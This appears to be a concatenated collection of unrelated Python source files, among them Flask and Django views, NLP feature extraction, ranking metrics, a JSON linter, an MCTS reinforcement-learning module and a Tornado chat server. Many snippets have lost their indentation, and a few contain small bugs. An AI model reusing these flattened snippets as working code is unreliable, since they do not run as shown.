vyvojar = db.session.query(Vyvojari).filter_by(id=id).first()
form=VyvojarForm(obj=vyvojar)
if form.validate_on_submit():
Vyvojari.delete(vyvojar)
Vyvojari.create(**form.data)
return redirect(url_for('public.FormularVyvojariList'))
return render_template("public/vyvojarForm.tmpl", action="Edit", form=form)
|
import unittest
'''test_dir="./tudou"
suits=unittest.defaultTestLoader.discover(test_dir,pattern="test*.py")
if __name__=="__main__":
runner=unittest.TextTestRunner()
runner.run(suits)'''
class Mytest(unittest.TestCase):
    @unittest.skip("unconditionally skip this test")
def test_skip(self):
print("aaa")
    @unittest.skipIf(3 > 2, "skip the test when the condition is true")
def test_skip_if(self):
print("bbb")
    @unittest.skipUnless(2 > 3, "run the test only when the condition is true")
def test_skip_unless(self):
print("ccc")
@unittest.expectedFailure
def test_expected_failure(self):
self.assertEqual(2,3)
''' @classmethod
def tearDownClass(cls):
cls.driver,quit()'''
|
from collections import Counter
from nltk.tokenize import word_tokenize
import nltk
import itertools
import numpy as np
from syntatic.parsing import *
import cPickle as pickle
## Find unique tokens in the corpus and returns token dictionary
def create_unigram_tokens(corpus, corpus_frequencies_filename = None):
freqs = Counter(list(itertools.chain.from_iterable(corpus)))
tokens = map(lambda x:x[0],freqs.most_common())
ans = dict(zip(tokens, range(0,len(tokens)) ))
if corpus_frequencies_filename:
with open(corpus_frequencies_filename + '.txt','w') as freq_out:
for word in tokens:
freq_out.write((word + u' ' + str(freqs[word]) + u'\n').encode('utf-8'))
pickle.dump(ans, open(corpus_frequencies_filename + '.pickle', 'wb'))
return ans
def char_ngram_tokenizer(text,n=2):
tokens = word_tokenize(text)
return [b[i:i+n] for b in tokens for i in range(len(b)-(n-1))]
## Returns a ngram frequency vector with dimension 1 x | tokens |
def ngram_vectorize(tokenized_text,tok2id):
feat_vec = np.zeros(shape=(len(tok2id),1))
for word in tokenized_text:
if word in tok2id.keys():
feat_vec[tok2id[word]] += 1
return feat_vec.T
def extract_ngram_for_training(corpus_plain_text,tokenizer):
corpus = [ tokenizer( (text).encode('utf8').decode('utf8') ) for text in corpus_plain_text]
tokens2id = create_unigram_tokens(corpus)
feats = [ ngram_vectorize(text,tokens2id) for text in corpus]
return (np.vstack(feats), tokens2id)
def parse_corpus_for_training(corpus_plain_text):
corpus = [ extract_productions_triples_taggedsent( (text).encode('utf8').decode('utf8') ) for text in corpus_plain_text]
prods = [ item['prods'] for item in corpus ]
triples = [ item['triples'] for item in corpus ]
return (triples,prods)
def extract_syntatic_feats_for_training(parsed_corpus):
triples,prods = parsed_corpus
#corpus = [ extract_productions_triples_taggedsent( (text).encode('utf8').decode('utf8') ) for text in corpus_plain_text]
prod2id = create_unigram_tokens(corpus=[prod for prod in prods])
trip2id = create_unigram_tokens(corpus=[trip for trip in triples])
feats1 = [ngram_vectorize(prod,prod2id) for prod in prods]
feats2 = [ngram_vectorize(trip,trip2id) for trip in triples]
return(np.vstack(feats1),np.vstack(feats2))
def extract_bigram_for_training(corpus_plain_text):
return extract_ngram_for_training(corpus_plain_text,nltk.bigrams)
def extract_unigram_for_training(corpus_plain_text):
return extract_ngram_for_training(corpus_plain_text, word_tokenize)
def extract_char_bigram_for_training(corpus_plain_text):
return extract_ngram_for_training(corpus_plain_text,lambda x: char_ngram_tokenizer(x,n=2))
def extract_char_trigram_for_training(corpus_plain_text):
return extract_ngram_for_training(corpus_plain_text,lambda x: char_ngram_tokenizer(x,n=3))
## Used at run time to classify text
def extract_unigram(corpus_plain_text,unigramDict):
corpus = [ word_tokenize( (text).encode('utf8').decode('utf8') ) for text in corpus_plain_text]
feats = [ ngram_vectorize(text,unigramDict) for text in corpus]
return np.vstack(feats)
def extract_bigram(corpus_plain_text,bigramDict):
corpus = [ nltk.bigrams( (text).encode('utf8').decode('utf8') ) for text in corpus_plain_text]
feats = [ ngram_vectorize(text,bigramDict) for text in corpus]
return np.vstack(feats)
def extract_char_trigram(corpus_plain_text,chartrigramDict):
tokenizer = lambda x: char_ngram_tokenizer(x,n=3)
corpus = [ tokenizer( (text).encode('utf8').decode('utf8') ) for text in corpus_plain_text]
feats = [ ngram_vectorize(text,chartrigramDict) for text in corpus]
return np.vstack(feats)
|
# -*- coding: UTF-8 -*-
# List comprehensions; inside a generator you can also call a function and use yield
def f(n):
return n * n
print([f(x) for x in range(10)])
# Lists, tuples, etc. can be unpacked in a single assignment: a, b, c = (1, 2, 3) makes a, b and c equal 1, 2 and 3
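# A small illustrative example of the notes above (values are arbitrary):
a, b, c = (1, 2, 3)               # multiple assignment: a == 1, b == 2, c == 3
def squares(n):
    for x in range(n):
        yield f(x)                # a generator produces the values lazily
print(list(squares(10)))          # same output as the list comprehension above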
|
# Implementation borrowed from https://github.com/gvishal/rank_text_cnn
# MAP and MRR metrics for learning to rank results evaluation
from collections import defaultdict
import numpy as np
from sklearn import metrics
def ap_score(cands):
    """
    Calculates average precision score for all candidates cands.
    Parameters
    ----------
    cands: list of (actual_label, predicted_score) tuples, sorted by predicted score (descending)
    """
    count = 0
    score = 0
    for i, (y_true, y_pred) in enumerate(cands):
if y_true > 0:
count += 1.0
score += count / (i + 1.0)
return score / (count + 1e-6)
def map_score(qids, labels, preds):
"""
Computes Mean Average Precision (MAP).
Parameters
----------
qids: list
Question ids
labels: list
True relevance labels
pred: list
Predicted ranking scores
Original Code:
https://github.com/aseveryn/deep-qa/blob/master/run_nnet.py#L403
"""
qid_2_cand = defaultdict(list)
for qid, label, pred in zip(qids, labels, preds):
assert pred >= 0 and pred <= 1
qid_2_cand[qid].append((label, pred))
avg_precs = []
for qid, cands in qid_2_cand.items():
avg_prec = ap_score(sorted(cands, reverse=True, key=lambda x: x[1]))
avg_precs.append(avg_prec)
return sum(avg_precs) / len(avg_precs)
def mrr_score_qid(cands):
for i, (y_true, y_pred) in enumerate(cands):
if y_true > 0:
return 1./(i + 1)
return 0
def mrr_score(qids, labels, preds):
"""
Computes Mean Reciprocal Rank (MRR).
Parameters
----------
qids: list
Question ids
labels: list
True relevance labels
pred: list
Predicted ranking scores
"""
qid_2_cand = defaultdict(list)
for qid, label, pred in zip(qids, labels, preds):
assert pred >= 0 and pred <= 1
qid_2_cand[qid].append((label, pred))
mrr_score = 0
for qid, cands in qid_2_cand.items():
mrr_score += mrr_score_qid(sorted(cands, reverse=True, key=lambda x: x[1]))
return mrr_score/len(qid_2_cand)
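# Illustrative sanity check with hypothetical data: two questions, each with three
# candidates, where the single relevant answer is ranked first by the predicted
# scores, so both MAP and MRR should come out at (approximately) 1.0.
if __name__ == "__main__":
    qids = [1, 1, 1, 2, 2, 2]
    labels = [1, 0, 0, 0, 1, 0]
    preds = [0.9, 0.3, 0.1, 0.2, 0.8, 0.4]
    print(map_score(qids, labels, preds))  # ~1.0 (up to the 1e-6 smoothing term)
    print(mrr_score(qids, labels, preds))  # 1.0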
|
# -*- coding: utf-8 -*-
from django.conf.urls import url
from admina import views
urlpatterns = [
url(r'^index$', views.index),
url(r'^check_news$', views.check_news),
url(r'^add_admin$', views.add_admin),
url(r'^check_admin$', views.check_admin),
url(r'^col_page1$', views.col_page1),
url(r'^col_page2$', views.col_page2),
url(r'^img$', views.img),
url(r'^img_form$', views.img_form),
    # views that return pages
url(r'^create_admin$', views.create_admin),
url(r'^$', views.login),
url(r'^inspect_admin$', views.inspect_admin),
url(r'^create_column$', views.create_column),
url(r'^inspect_column', views.inspect_column),
url(r'^delete$', views.delete),
url(r'^colum_info$', views.colum_info),
url(r'^add_news_column$', views.add_news_column),
url(r'^inspect_img$', views.inspect_img),
url(r'^save_picture$', views.save_picture),
url(r'^update_admin$', views.update_admin),
url(r'^update_colum$', views.update_colum),
    # views with special behaviour
]
|
from django.shortcuts import render, HttpResponse
from api.libs.base import CoreView
from account.models import UserProfile
from django.contrib.auth.models import User
from django.contrib.auth.models import Group
from django.db.utils import IntegrityError
# Create your views here.
class Account(CoreView):
"""
    User-related API endpoints
"""
login_required_action = ["get_list", "post_create", "post_change_status", "get_user", "post_change", "post_changepwd"]
superuser_required_action = ["get_list", "post_create", "post_change_status", "get_user", "post_change", "post_changepwd"]
def get_list(self):
"""
        Return the list of users.
:return:
"""
user_list = []
user_objs = UserProfile.objects.all()
for user_obj in user_objs:
user_list.append(user_obj.get_info())
self.response_data['data'] = user_list
def post_create(self):
"""
        Create a new user.
:return:
"""
try:
username = self.parameters('username')
password = self.parameters('password')
email = self.parameters('email')
group_ids = self.parameters("group").split(",")
group_objs = Group.objects.filter(id__in=group_ids).all()
is_active = True if self.parameters('status') == 'true' else False
is_superuser = True if self.parameters('is_superuser') == 'true' else False
nickname = self.parameters('nickname')
avatar = self.parameters('avatar')
            # create_user hashes the password (a plain create() would store it in clear text)
            user_obj = User.objects.create_user(username=username, password=password, email=email,
                                                is_superuser=is_superuser, is_active=is_active)
for group_obj in group_objs:
user_obj.groups.add(group_obj)
user_obj.save()
user_profile_obj = UserProfile.objects.create(user=user_obj, nickname=nickname, avatar=avatar)
self.response_data['data'] = user_profile_obj.get_info()
except IntegrityError:
self.response_data['status'] = False
self.status_code = 416
# def post_disable(self):
# user_id = self.parameters("user_id")
# user_profile_obj = UserProfile.objects.filter(id=user_id).first()
# if user_profile_obj and user_profile_obj.user:
# user_profile_obj.user.is_active = False
# user_profile_obj.user.save()
# else:
# self.response_data['status'] = False
# self.response_data['data'] = "要编辑的用户不存在"
# self.status_code = 404
# self.response_data['data'] = user_profile_obj.get_info()
#
# def post_enable(self):
# user_id = self.parameters("user_id")
# user_profile_obj = UserProfile.objects.filter(id=user_id).first()
# if user_profile_obj and user_profile_obj.user:
# user_profile_obj.user.is_active = True
# user_profile_obj.user.save()
# else:
# self.response_data['status'] = False
# self.response_data['data'] = "要编辑的用户不存在"
# self.status_code = 404
# self.response_data['data'] = user_profile_obj.get_info()
def post_change_status(self):
user_id = self.parameters("user_id")
is_active = True if self.parameters('status') == 'true' else False
user_profile_obj = UserProfile.objects.filter(id=user_id).first()
        if user_profile_obj and user_profile_obj.user:
            user_profile_obj.user.is_active = is_active
            user_profile_obj.user.save()
            self.response_data['data'] = user_profile_obj.get_info()
        else:
            self.response_data['status'] = False
            self.response_data['data'] = "要编辑的用户不存在"
            self.status_code = 404
def get_user(self):
user_id = self.parameters("user_id")
user_profile_obj = UserProfile.objects.filter(id=user_id).first()
if user_profile_obj:
self.response_data['data'] = user_profile_obj.get_info()
else:
self.status_code = 404
def post_change(self):
"""
        Edit an existing user.
:return:
"""
user_id = self.parameters('id')
username = self.parameters('username')
email = self.parameters('email')
is_active = True if self.parameters('status') == 'true' else False
is_superuser = True if self.parameters('is_superuser') == 'true' else False
nickname = self.parameters('nickname')
avatar = self.parameters('avatar')
group_ids = self.parameters("group").split(",")
user_profile_obj = UserProfile.objects.filter(id=user_id).first()
group_objs = Group.objects.filter(id__in=group_ids).all()
if user_profile_obj:
try:
user_profile_obj.user.username = username
user_profile_obj.user.email = email
user_profile_obj.user.is_active = is_active
user_profile_obj.user.is_superuser = is_superuser
                user_profile_obj.user.groups.clear()  # direct assignment to an m2m manager is not allowed in newer Django
for group_obj in group_objs:
user_profile_obj.user.groups.add(group_obj)
user_profile_obj.user.save()
user_profile_obj.avatar = avatar
user_profile_obj.nickname = nickname
user_profile_obj.save()
except IntegrityError:
self.response_data['status'] = False
self.status_code = 416
else:
self.response_data['status'] = False
self.status_code = 404
def post_changepwd(self):
"""
        Change a user's password.
"""
newpassword = self.parameters("newpassword")
user_id = self.parameters("user_id")
user_profile_obj = UserProfile.objects.filter(id=user_id).first()
if user_profile_obj:
user_profile_obj.user.set_password(newpassword)
user_profile_obj.user.save()
else:
self.response_data['status'] = False
self.status_code = 404
|
#-*- coding:utf-8 -*-
# This is version 1.0 of the API
from flask import Blueprint
api=Blueprint('api',__name__)
from . import authentication,posts,users,comments,errors
|
def half_fib(n):
if n == 1 or n == 2:
return 1
else:
sum = (half_fib(n - 1) + half_fib(n - 2)) % 1000000007
if n % 3 == 0:
return sum - 1
else:
return sum
FIVE_SQUARED = 5 ** 0.5
FI = (1 + FIVE_SQUARED) / 2
PSI = (1 - FIVE_SQUARED) / 2
def half_fib2(n):
fib = (FI ** n - PSI ** n) / FIVE_SQUARED % 2000000014
return (int(round(fib)) + 1) // 2
num_tests = int(raw_input())
for test_index in range(num_tests):
height = int(raw_input())
print(str(half_fib2(height)))
|
from autodisc.systems.statistics.observationdifference import ObservationDifferenceStatistic
|
from abc import ABC, abstractmethod
from pathlib import Path
from typing import Dict, List, Optional, Union
import json
import jsonschema
from flint import LintContext, Lintable
JSON = Dict[str, Union[str, int, List["JSON"], "JSON"]]
JsonPathElement = Union[str, int]
class JsonRule(ABC):
"""
A linting rule that is applied to a JSON object.
This class is not private because it is intended for extension by users.
"""
@abstractmethod
def lint(self, json_obj: JSON, context: LintContext) -> None:
pass
def try_as_int(s: str) -> Union[str, int]:
try:
return int(s)
except ValueError:
return s
class JsonPath:
def __init__(self, elements: List[JsonPathElement]) -> None:
self.elements = list(elements)
@staticmethod
def compile(s: str) -> "JsonPath":
elements = [try_as_int(x) for x in s.split("/") if x]
if not elements:
raise ValueError(f"could not compile '{s}' into JsonPath")
return JsonPath(elements)
def matches(self, context: LintContext, json_object: JSON) -> List[JSON]:
current = [json_object]
try:
for element in self.elements:
# Array index
if isinstance(element, int):
if isinstance(current[0], list):
current = [x[element] for x in current]
else:
return []
# Object property lookup
elif isinstance(element, str):
if isinstance(current[0], dict):
current = [x[element] for x in current]
elif isinstance(current[0], list):
if element == "*":
current = [elem for elems in current for elem in elems]
else:
return []
except KeyError as ex:
context.error(f"could not find key: {ex}")
return current
def __str__(self) -> str:
return "/".join(self.elements)
class _JsonCollectValues(JsonRule):
def __init__(
self, json_path: JsonPath, group: str, key: str, optional: bool = False
) -> None:
self.json_path = json_path
self.group = group
self.key = key
self.optional = optional
def lint(self, json_obj: JSON, context: LintContext) -> None:
found = []
for match in self.json_path.matches(context, json_obj):
found.append(match)
context.extend_property(self.group, self.key, found)
if not self.optional and not found:
context.error(f"JsonPath {self.json_path} did not match any elements")
class _JsonFollowsSchema(JsonRule):
"""
Validates JSON content against a JSON schema.
See: https://json-schema.org/
"""
# Try not to load the same schema more than once
SCHEMA_CACHE: Dict[Path, JSON] = {}
def __init__(self, schema_filename: str) -> None:
self.schema_filename = schema_filename
def lint(self, json_obj: JSON, context: LintContext) -> None:
schema = self.load_schema_file(Path(self.schema_filename), context)
if schema is None:
return
try:
jsonschema.validate(instance=json_obj, schema=schema)
except jsonschema.exceptions.ValidationError as ex:
context.error(f"{ex.message} JSON: {ex.instance}")
@staticmethod
def find_schema_file(path: Path, context: LintContext) -> Optional[Path]:
if path.is_absolute():
return path
search_paths = [Path.cwd()]
for schema_dir in context.args.schema_directories:
if schema_dir.is_absolute():
search_paths.append(Path(schema_dir))
else:
search_paths.append(Path(Path.cwd(), Path(schema_dir)))
for search_path in search_paths:
try_path = Path(search_path, path)
if try_path.is_file():
return try_path
return None
@staticmethod
def load_schema_file(path: Path, context: LintContext) -> Optional[JSON]:
result = _JsonFollowsSchema.SCHEMA_CACHE.get(path, None)
if result is None:
schema_path = _JsonFollowsSchema.find_schema_file(path, context)
if schema_path:
try:
result = json.loads(schema_path.read_text())
_JsonFollowsSchema.SCHEMA_CACHE[path] = result
return result
except json.decoder.JSONDecodeError as ex:
context.error(
f"Malformed JSON found in schema file: {schema_path} - {ex}"
)
return None
except FileNotFoundError as ex:
context.error(
f"Could not find JSON schema file: {schema_path} - {ex}"
)
return None
except jsonschema.exceptions.SchemaError as ex:
context.error(
f"Invalid JSON schema file: {schema_path} - {ex.message}"
)
return None
else:
context.error(
f"Could not find JSON schema file: {path} in {','.join(str(p) for p in context.args.schema_directories)}"
)
return result
class _JsonContent(Lintable):
def __init__(self, children: Optional[List[JsonRule]] = None) -> None:
self.children = list(children) if children else []
def lint(self, context: LintContext) -> None:
        if not context.path.is_file():
            context.error(f"Can only check JSON content for files: {context.path}")
            return
json_text = context.path.read_text()
try:
json_object = json.loads(json_text)
except json.decoder.JSONDecodeError as ex:
context.error(str(ex))
else:
for child in self.children:
child.lint(json_object, context)
def json_content(*args, **kwargs) -> Lintable:
return _JsonContent(*args, **kwargs)
def follows_schema(schema_file_name: str) -> JsonRule:
return _JsonFollowsSchema(schema_file_name)
def collect_values(*args, **kwargs):
return _JsonCollectValues(*args, **kwargs)
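# Hypothetical composition sketch (the flint runner that consumes these Lintable
# objects lives outside this module, so the file names and paths below are
# illustrative only):
#
#     package_json_checks = json_content([
#         follows_schema("package.schema.json"),
#         collect_values(JsonPath.compile("/dependencies/*/name"), "deps", "names", optional=True),
#     ])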
|
import time
import random
import numpy as np
import pandas as pd
import math
import sys
import os.path
import matplotlib
import matplotlib.pyplot as plt
TTABLE_IDX_ACTIONS_COUNT = 1
TTABLE_IDX_TABLE = 0
class TreeData:
def __init__(self):
# solver params
self.LEARNING_RATE = 0.01
self.DISCOUNT = 0.95
self.EXPLORE_STOP = 0.01
self.EXPLORE_START = 1.0
self.EXPLORE_RATE = 0.0001
self.SIZE_TRANSITION_TO_COMPLETE_TABLE = 5
# tables
self.MIN_TRANSITIONS_TO_CONTINUE_SIM = 1
self.T_TABLE = None
self.Q_TABLE = None
self.STATE_DICT = None
self.VALUES_2_UPDATE_DICT = None
self.MAX_SIMULATE_DEPTH = 25
self.MAX_ROLLOUT_DEPTH = 300
# model params
self.NUM_ACTIONS = None
self.TERMINAL_STATES = ['win', 'loss', 'tie', 'terminal']
self.REWARDS = {}
self.REWARDS['win'] = 1
self.REWARDS['loss'] = -1
self.REWARDS['tie'] = -1
self.REWARDS['terminal'] = 0
self.MIN_REWARD = min(self.REWARDS.values())
def ExplorationFactor(self, count):
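        # Exponentially decaying exploration factor: with the defaults above it
        # starts at EXPLORE_START = 1.0, is roughly 0.01 + 0.99 * exp(-1) ~= 0.37
        # after 10,000 visits (EXPLORE_RATE = 0.0001), and tends to EXPLORE_STOP = 0.01.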
return self.EXPLORE_STOP + (self.EXPLORE_START - self.EXPLORE_STOP) * np.exp(-self.EXPLORE_RATE * count)
def ChooseRandomState(self, minTransitionsCount = 5):
numVals = 0
while numVals < minTransitionsCount:
state = random.choice(list(self.T_TABLE.table.keys()))
if type(self.T_TABLE.table[state])==list and len(self.T_TABLE.table[state]) > 1:
numVals = sum(self.T_TABLE.table[state][1])
stateOnlyTable = ''.join(state)
return stateOnlyTable
def UpdateQTable(self, qTableName):
self.Q_TABLE = pd.read_pickle(qTableName + '.gz', compression='gzip')
count = 0
for s, toUpdate in self.VALUES_2_UPDATE_DICT.items():
count += len(toUpdate)
for a, val in toUpdate.items():
                # assumes action indices double as the Q-table column labels
                self.Q_TABLE.loc[s, a] += self.LEARNING_RATE * (val - self.Q_TABLE.loc[s, a])
self.Q_TABLE.to_pickle(qTableName + '.gz', 'gzip')
return count
TREE_DATA = TreeData()
def LenStat(tTableName, numiterations = 100, maxNumRec = 100, runOnAllOptions = False):
ttable = pd.read_pickle(tTableName + '.gz', compression='gzip')
terminalStates = ['loss' ,'win','tie']
allStates = list(ttable.keys())
allLength = []
allDeadEnds = 0
allLiveEnds = 0
i = 0
while i < numiterations:
s = random.choice(allStates)
if s != "TrialsData":
print("\n\n\nstate:",s,"\n", ttable[s])
i += 1
l, deadEnds, liveEnds = LenToTerminal(ttable, s, terminalStates, runOnAllOptions, maxNumRec)
allLength = l + allLength
allDeadEnds = deadEnds + allDeadEnds
allLiveEnds = allLiveEnds + liveEnds
print("deadEnds = ", allDeadEnds, "liveEnds = ", allLiveEnds)
plt.hist(allLength)
plt.show()
return allLength, allDeadEnds, allLiveEnds
def LenToTerminal(ttable, s, terminalStates, runOnAllOptions = False, maxRecDepth = 50, currIdx = 0):
if s in terminalStates:
return [currIdx], 0, 1
elif currIdx == maxRecDepth:
return [currIdx], 1, 0
else:
#stateHist.append(s)
table = ttable[s][0]
allStates = list(table.index)
allLength = []
allLiveEnds = 0
if len(allStates) == 0:
allDeadEnds = 1
else:
allDeadEnds = 0
if runOnAllOptions:
for s_ in allStates:
if s_ != s:
l, deadEnds, liveEnds = LenToTerminal(ttable, s_, terminalStates, runOnAllOptions, maxRecDepth, currIdx + 1)
allLength = allLength + l
allDeadEnds = deadEnds + allDeadEnds
allLiveEnds = liveEnds + allLiveEnds
else:
choose = False
while not choose:
s_ = random.choice(allStates)
if s_ != s:
choose = True
allLength, allDeadEnds, allLiveEnds = LenToTerminal(ttable, s_, terminalStates, runOnAllOptions, maxRecDepth, currIdx + 1)
return allLength, allDeadEnds, allLiveEnds
# LenStat("melee_attack_ttable_onlineHallucination", 20,50, True)
def HallucinationMngrPSFunc(sharedDict):
TREE_DATA.NUM_ACTIONS = sharedDict["num_actions"]
TREE_DATA.STATE_DICT = {}
TREE_DATA.VALUES_2_UPDATE_DICT = {}
qTableName = sharedDict["q_table"]
tTableName = sharedDict["t_table"]
hMngr = HallucinationMngr()
TTableCreated = False
if os.path.isfile(tTableName + '.gz') and not TTableCreated:
TREE_DATA.T_TABLE = pd.read_pickle(tTableName + '.gz', compression='gzip')
TTableCreated = True
while True:
while TTableCreated:
if hMngr.UpdateRoot(sharedDict):
hMngr.Hallucinate(sharedDict)
hMngr.InsertValues2Dict()
if sharedDict["updateTableFlag"]:
break
updateTableFlag = False
while not updateTableFlag:
updateTableFlag = sharedDict["updateTableFlag"]
count = TREE_DATA.UpdateQTable(qTableName)
TREE_DATA.T_TABLE = pd.read_pickle(tTableName + '.gz', compression='gzip')
TTableCreated = True
sharedDict["updateTableFlag"] = False
print("\n\n\tupdate q table count vals =", count)
TREE_DATA.VALUES_2_UPDATE_DICT = {}
TREE_DATA.STATE_DICT = {}
class HallucinationMngr:
def __init__(self):
self.currRoot = None
def UpdateTables(self, qTable, tTable):
TREE_DATA.Q_TABLE = qTable.table.copy()
TREE_DATA.T_TABLE = tTable.table.copy()
TREE_DATA.STATE_DICT = {}
self.updateTable = True
def Hallucinate(self, sharedDict):
contHallucinate = True
while contHallucinate:
self.currRoot.Simulate(self.currRoot)
            if sharedDict["updateStateFlag"]:
contHallucinate = False
def UpdateRoot(self, sharedDict):
        if sharedDict["updateStateFlag"]:
nextState = sharedDict["nextState"]
sharedDict["updateStateFlag"] = False
if nextState in TREE_DATA.T_TABLE:
if nextState not in TREE_DATA.STATE_DICT:
TREE_DATA.STATE_DICT[nextState] = StateNode(nextState)
self.currRoot = TREE_DATA.STATE_DICT[nextState]
return True
return False
def ChooseAction(self):
        if self.currRoot is None:
return None
return self.currRoot.ChooseAction()
def Value(self,action):
        if self.currRoot is None:
return None
return self.currRoot.Value(action)
def ExecuteAction(self, state, action):
if state in TREE_DATA.T_TABLE:
return self.currRoot.FindNextState(state, action)
else:
return "terminal"
def InsertValues2Dict(self):
        if self.currRoot is not None:
self.currRoot.InsertValues2Dict()
def Depth(self):
        if self.currRoot is not None:
return self.currRoot.Depth() + 1
else:
return 0
def Size(self):
        if self.currRoot is not None:
return self.currRoot.Size()
else:
return 0
def Count(self):
        if self.currRoot is not None:
return self.currRoot.count
else:
return 0
class StateNode:
def __init__(self, state, count = 0):
self.state = state
self.count = count
self.actionChilds = []
self.CreateActionChilds()
# self.terminationCount = {}
# self.terminationCount["loss"] = 0
# self.terminationCount["win"] = 0
# self.terminationCount["tie"] = 0
# self.terminationCount["terminal"] = 0
# self.terminationCount["recDepth"] = 0
def Simulate(self, root, currIdx = 0):
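        # One MCTS pass: pick an action by UCB, sample a successor from the
        # transition table, expand and roll out when the successor is new (or the
        # depth cap is hit), recurse otherwise, then back up the discounted reward.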
action = self.UpperBoundAction()
nextState = self.FindNextState(self.state, action)
if nextState in TREE_DATA.TERMINAL_STATES:
maxIdx = currIdx
reward = TREE_DATA.REWARDS[nextState]
elif nextState not in self.actionChilds[action].stateChilds or currIdx >= TREE_DATA.MAX_SIMULATE_DEPTH:
maxIdx = currIdx
rollOutHist = [nextState]
reward = TREE_DATA.DISCOUNT * self.Rollout(nextState, root, rollOutHist, currIdx + 1)
self.actionChilds[action].AddState(nextState)
else:
r, maxIdx = self.actionChilds[action].stateChilds[nextState].Simulate(root, currIdx + 1)
reward = TREE_DATA.DISCOUNT * r
self.UpdateReward(action, reward)
return reward, maxIdx
def Rollout(self, state, root, rolloutHist, currIdx):
if currIdx >= TREE_DATA.MAX_ROLLOUT_DEPTH:
return 0
rolloutHist.append(state)
nextState = "terminal"
if state in TREE_DATA.T_TABLE:
            if TREE_DATA.T_TABLE[state][TTABLE_IDX_ACTIONS_COUNT] is not None:
actionCount = TREE_DATA.T_TABLE[state][TTABLE_IDX_ACTIONS_COUNT]
existingAction = [i for i in range(len(actionCount)) if actionCount[i] > 0]
action = random.choice(existingAction)
nextState = self.FindNextState(state, action, rolloutHist)
if nextState in TREE_DATA.TERMINAL_STATES:
return TREE_DATA.REWARDS[nextState]
else:
return TREE_DATA.DISCOUNT * self.Rollout(nextState, root, rolloutHist, currIdx + 1)
def CreateActionChilds(self):
        valueVector = np.zeros(TREE_DATA.NUM_ACTIONS, dtype=float, order='C')
for a in range(0, TREE_DATA.NUM_ACTIONS):
self.actionChilds.append(ActionNode(self.state, a, valueVector[a]))
def UpperBoundAction(self):
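        # UCB1-style selection: any action that has never been tried (count == 0)
        # is returned immediately; otherwise pick the argmax of
        # value + ExplorationFactor(parent visits) * sqrt(ln(parent visits + 1) / child visits).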
bestValue = TREE_DATA.MIN_REWARD - 1
bestAction = -1
actionCount = TREE_DATA.T_TABLE[self.state][TTABLE_IDX_ACTIONS_COUNT]
existingActions = [i for i in range(len(actionCount)) if actionCount[i] > 0]
for a in existingActions:
if self.actionChilds[a].count == 0:
return a
val = self.actionChilds[a].value + TREE_DATA.ExplorationFactor(self.count) * math.sqrt(math.log(self.count + 1) / self.actionChilds[a].count)
if val > bestValue:
bestValue = val
bestAction = a
return bestAction
def ChooseAction(self):
if len(self.actionChilds) == 0:
return None
idxMax = -1
rewardMax = TREE_DATA.MIN_REWARD - 1
for a in range (0, TREE_DATA.NUM_ACTIONS):
if self.actionChilds[a].value > rewardMax:
idxMax = a
rewardMax = self.actionChilds[a].value
return idxMax
def Value(self, action):
if len(self.actionChilds) == 0:
return None
return self.actionChilds[action].value
def InsertValues2Dict(self):
if self.state not in TREE_DATA.VALUES_2_UPDATE_DICT:
TREE_DATA.VALUES_2_UPDATE_DICT[self.state] = {}
for a in range(0, TREE_DATA.NUM_ACTIONS):
child = self.actionChilds[a]
if child.count > 0:
TREE_DATA.VALUES_2_UPDATE_DICT[self.state][a] = child.value
def FindNextState(self, state, action, avoidStates = []):
stateSize = TREE_DATA.T_TABLE[state][TTABLE_IDX_ACTIONS_COUNT][action]
stateNum = random.randint(0, stateSize)
prevDifferentState = "terminal"
for s_ in TREE_DATA.T_TABLE[state][TTABLE_IDX_TABLE].index:
            # assumes action indices double as the transition-table column labels
            stateNum -= TREE_DATA.T_TABLE[state][TTABLE_IDX_TABLE].loc[s_, action]
if s_ != state and s_ not in avoidStates:
prevDifferentState = s_
if stateNum <= 0 and prevDifferentState != "terminal":
break
return prevDifferentState
def UpdateReward(self, action, reward):
if reward != 0:
self.actionChilds[action].UpdateReward(reward)
self.count += 1
def Depth(self):
d = 0
for a in self.actionChilds:
d = max(d, a.Depth())
return d + 1
def Size(self):
size = 0
for a in self.actionChilds:
size += a.Size()
return size + 1
class ActionNode:
def __init__(self, state, action, value = 0):
self.fatherState = state
self.action = action
self.stateChilds = {}
self.value = value
self.count = 0
def AddState(self, state, count = 0):
if state not in TREE_DATA.STATE_DICT:
TREE_DATA.STATE_DICT[state] = StateNode(state, count)
if state != self.fatherState:
self.stateChilds[state] = TREE_DATA.STATE_DICT[state]
def UpdateReward(self, reward):
if reward != 0:
self.value = (self.value * self.count + reward) / (self.count + 1)
self.count += 1
def Depth(self):
d = 0
for state in self.stateChilds.values():
d = max(d, state.Depth())
return d
def Size(self):
size = len(self.stateChilds)
for state in self.stateChilds.values():
size += state.Size()
return size
|
M, D = input().split()
print("yup" if (M == "OCT" and D == "31") or (M == "DEC" and D == "25") else "nope")
|
import datetime
import json
import os
import uuid
import tornado.escape
import tornado.ioloop
import tornado.web
import tornado.websocket
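# Wire protocol (inferred from the handlers below): clients send JSON such as
#   {"event": "nickname-update", "data": {"nickname": "alice"}}
#   {"event": "message", "data": {"body": "hello"}}
# and the server broadcasts "server-message" envelopes for joins, leaves and
# nickname changes, plus "user-message" envelopes for chat messages.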
class ChatWebSocket(tornado.websocket.WebSocketHandler):
clients = []
def open(self):
print("websocket opened")
self.ID = str(uuid.uuid4())
self.nickname = self.ID
if self not in self.clients:
self.clients.append(self)
to_send = {
"event": "server-message",
"data": {
"type": "user-join",
"timestamp": str(datetime.datetime.utcnow()),
"user": {
"id": self.ID,
"nickname": self.nickname
}
}
}
self.broadcast(json.dumps(to_send))
def on_message(self, message):
print("recieved message from {}: {}".format(self.ID, message))
parsed = json.loads(message)
if parsed["event"] == "nickname-update":
old_nickname = self.nickname
self.nickname = tornado.escape.xhtml_escape(parsed["data"]["nickname"])
to_send = {
"event": "server-message",
"data": {
"type": "nickname-update",
"timestamp": str(datetime.datetime.utcnow()),
"user": {
"id": self.ID,
"old-nickname": old_nickname,
"new-nickname": self.nickname
}
}
}
self.broadcast(json.dumps(to_send))
elif parsed["event"] == "message":
to_send = {
"event": "user-message",
"data": {
"id": str(uuid.uuid4()),
"timestamp": str(datetime.datetime.utcnow()),
"body": tornado.escape.xhtml_escape(parsed["data"]["body"]),
"from": {
"id": self.ID,
"nickname": self.nickname
}
}
}
self.broadcast(json.dumps(to_send))
def on_close(self):
print("websocket closed")
self.clients.remove(self)
to_send = {
"event": "server-message",
"data": {
"type": "user-leave",
"timestamp": str(datetime.datetime.utcnow()),
"user": {
"id": self.ID,
"nickname": self.nickname
}
}
}
